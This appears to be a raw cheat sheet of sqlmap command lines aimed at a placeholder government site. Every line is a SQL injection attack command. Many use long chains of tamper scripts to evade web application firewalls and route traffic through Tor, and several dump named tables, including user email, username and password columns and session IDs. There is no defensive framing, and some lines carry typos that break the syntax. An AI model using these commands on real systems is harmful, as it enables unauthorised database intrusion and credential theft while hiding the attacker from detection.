- sqlmap -u " target.gov " --identify-waf --random-agent -v 3 --tamper= " between,randomcase,space2comment " --dbs --batch
- sqlmap -u " target.gov " --identify-waf --random-agent -v 3 --dbs --batch
- sqlmap -u " target.gov " --identify-waf --random-agent -v 3 --tamper= " between,randomcase,space2comment " --level=5 --risk=3 --dbs --batch
- sqlmap -u " target.gov/login " --data= " userid=admin&passwd=admin " --method POST --identify-waf --random-agent -v 3 --tamper= " between,randomcase,space2comment " --level=5 --risk=3 --dbs --batch
- sqlmap -u " target.gov " --level=5 --skip-waf --dbs --batch
- sqlmap -u " target.gov " --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
- sqlmap -u " target.gov " --dbms= " MySQL " -v3 --technique U --tamper= " space2mysqlblank.py " --dbs --batch
- sqlmap -u " target.gov " --dbms= " MySQL " -v3 --technique U --tamper= " space2comment " --dbs --batch
- sqlmap -u " target.gov " -v3 --technique=T --no-cast --fresh-queries --banner --dbs --batch
- sqlmap -u " target.gov " --level 2 --risk 3 --batch --dbs
- sqlmap -u " target.gov " -f -b --current-user --current-db --is-dba --users --dbs --batch
- sqlmap -u " target.gov " --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs --batch
- sqlmap -u " target.gov " --risk 3 --level 5 --random-agent --proxy http://127.0.0.1:5980 --dbs --batch
- sqlmap -u " target.gov " --random-agent --dbms=MYSQL --dbs --technique=B " --batch
- sqlmap -u " target.gov " --identify-waf --random-agent -v 3 --dbs --batch
- sqlmap -u " target.gov " --identify-waf --random-agent -v 3 --tamper= " between,randomcase,space2comment " --dbs --batch
- sqlmap -u " target.gov " --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 --batch
- sqlmap -u " target.gov " --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump --batch
- sqlmap -u " target.gov " --tables -D miss_db --is-dba --threads= " 10 " --time-sec=10 --timeout=5 --no-cast --
tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent --batch
- sqlmap -u " target.gov " -v 3 --dbms " MySQL " --technique U -p id --batch --tamper " space2morehash.py "
- sqlmap -u " target.gov " --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --batch
- sqlmap -u " target.gov " -v3 --dbms= " MySQL " --risk=3 --level=3 --technique=BU --tamper= " space2mysqlblank.py " --random-agent -D damksa_abr -T admin,jobadmin,member --columns --batch
- sqlmap -u " target.gov " --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --batch
- sqlmap -u " target.gov " --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql --batch
- sqlmap -u " target.gov " --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -batch
- sqlmap -u " target.gov " --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --batch
- sqlmap -u " target.gov " --level=5 --risk=3 -p " id " –-tamper= " apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords " --batch
- sqlmap -u " target.gov:80/search.cmd ? form_state=1 " –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --batch
-sqlmap -u " target.gov " --tamper " randomcase.py " --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms " MySQL " --current-db --random-agent --batch
- sqlmap -u " target.gov " --tamper " randomcase.py " --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms " MySQL " --current-db --random-agent -D " pache_PACHECOCARE " --tables --batch
- sqlmap -u " target.gov " --tamper " randomcase.py " --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms " MySQL " --current-db --random-agent -D " pache_PACHECOCARE " -T " edt_usuarios " --columns --batch
- sqlmap -u " target.gov " --tamper " randomcase.py " --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms " MySQL " --current-db --random-agent -D " pache_PACHECOCARE " -T " edt_usuarios " -C " ud,email,usuario,contra " --dump --batch
- sqlmap -u " target.gov " tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql --batcH